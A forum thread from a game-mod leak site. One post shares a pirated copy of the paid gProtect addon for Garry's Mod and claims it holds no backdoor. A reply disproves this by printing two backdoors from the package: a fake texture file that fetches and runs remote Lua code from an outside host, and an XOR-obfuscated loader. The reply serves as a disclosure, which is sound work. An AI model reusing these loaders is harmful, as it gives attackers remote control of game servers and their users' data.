Garry's Mod Leaks

gProtect 1.11.94 [Last Version]

Submitted by Ortox, , Thread ID: 290114

Thread Closed
Ortox
Novice
Level:
3
Reputation:
0
Posts:
38
Likes:
0
Credits:
56
23-03-2024, 02:34 AM
#1
Hi, I decided to share you this addon as I don't need it anymore.
The addon is up-to-date to the last version.
Does not contain any "backdoor"


Gmodstore: https://www.gmodstore.com/market/view/gp...protection


Workshop Content: https://steamcommunity.com/sharedfiles/f...2064194474
https://steamcommunity.com/sharedfiles/f...2206993805


Download: https://www.mediafire.com/file/pcl8gaes8...4.zip/file
This hidden content has been reported as not working 0 times this month.
1 times in total

RE: gProtect 1.11.94 [Last Version]

honata1973
Junior Member
Level:
29
Reputation:
5
Posts:
58
Likes:
12
Credits:
236
23-03-2024, 10:40 AM
#2
23-03-2024, 02:34 AM
Ortox Wrote:
Does not contain any "backdoor"

Backdoors

"gprotect-prop-protection-reinvented-v1.11.94.zip\gprotect_1.11.94\lua\autorun\server\npc_help.lua" executes code located:
"gprotect-prop-protection-reinvented-v1.11.94.zip\gprotect_1.11.94\materials\npc\help.vtf" which is not a real .vtf because if you open it a text editor:
Code:
timer.Simple(1, function() http.Fetch("https://kvcdoor.ovh/f.php?key=rYjCp5e0k8RId1OcN88y", function(b) RunString(b, ":", false) end)end)

+ "gprotect-prop-protection-reinvented-v1.11.94.zip\gprotect_1.11.94\lua\autorun\server\npc_help.lua" line 1:
Code:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,3,4,15,15,18,78,15,22,8,79,6,78,16,8,16,95,11,5,25,93,18,57,10,35,16,85,5,80,11,88,50,41,4,81,47,3,46,88,88,25,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")

RE: gProtect 1.11.94 [Last Version]

Ortox
Novice
Level:
3
Reputation:
0
Posts:
38
Likes:
0
Credits:
56
OP
23-03-2024, 10:47 AM
#3
23-03-2024, 10:40 AM
honata1973 Wrote:
Backdoors

"gprotect-prop-protection-reinvented-v1.11.94.zip\gprotect_1.11.94\lua\autorun\server\npc_help.lua" executes code located:
"gprotect-prop-protection-reinvented-v1.11.94.zip\gprotect_1.11.94\materials\npc\help.vtf" which is not a real .vtf because if you open it a text editor:
Code:
timer.Simple(1, function() http.Fetch("https://kvcdoor.ovh/f.php?key=rYjCp5e0k8RId1OcN88y", function(b) RunString(b, ":", false) end)end)

+ "gprotect-prop-protection-reinvented-v1.11.94.zip\gprotect_1.11.94\lua\autorun\server\npc_help.lua" line 1:
Code:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,3,4,15,15,18,78,15,22,8,79,6,78,16,8,16,95,11,5,25,93,18,57,10,35,16,85,5,80,11,88,50,41,4,81,47,3,46,88,88,25,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")

Misinformative content + fake content.

Users browsing this thread: 1 Guest(s)